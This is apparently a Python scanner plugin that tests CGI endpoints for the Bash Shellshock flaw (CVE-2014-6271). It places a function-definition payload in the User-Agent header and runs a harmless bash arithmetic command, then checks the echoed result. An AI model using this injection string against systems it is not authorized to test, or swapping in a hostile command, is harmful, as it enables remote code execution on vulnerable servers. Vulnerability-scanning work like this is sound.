#!/usr/bin/env python3
# @Time    : 2020-02-17
# @Author  : caicai
# @File    : poc_bash-cve-2014-6271.py
import copy
from myscan.lib.helper.request import request
from myscan.lib.core.common import get_random_num
from myscan.lib.parse.dictdata_parser import dictdata_parser
from myscan.lib.parse.response_parser import response_parser


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "bash shellshock check"
        self.vulmsg = "参考 https://www.freebuf.com/news/48331.html"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        # 添加限定条件
        if self.dictdata.get("url").get("extension").lower() !="cgi":
            return
        request_headers=self.dictdata.get("request").get("headers")
        request_headers_forpayload=copy.deepcopy(request_headers)
        random1=get_random_num(6)
        random2=get_random_num(6)
        random_total=random1+random2
        request_headers_forpayload['User-Agent']="() { :; }; echo; echo; /bin/bash -c 'expr %s + %s'"%(random1,random2)


        parser=dictdata_parser(self.dictdata)
        req = {
            "method": "GET",
            "url": parser.getfilepath(),
            "params": parser.getrequestparams_urlorcookie("url"),
            "headers": request_headers_forpayload,
            "data": parser.getrequestbody(),
            "timeout": 10,
            "verify": False,
            "allow_redirects": False,
        }
        r = request(**req)
        if r!=None:
            if str(random_total) in r.text:
                parser_=response_parser(r)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "request":parser_.getrequestraw(),
                        "response":parser_.getresponseraw(),
                    }
                })
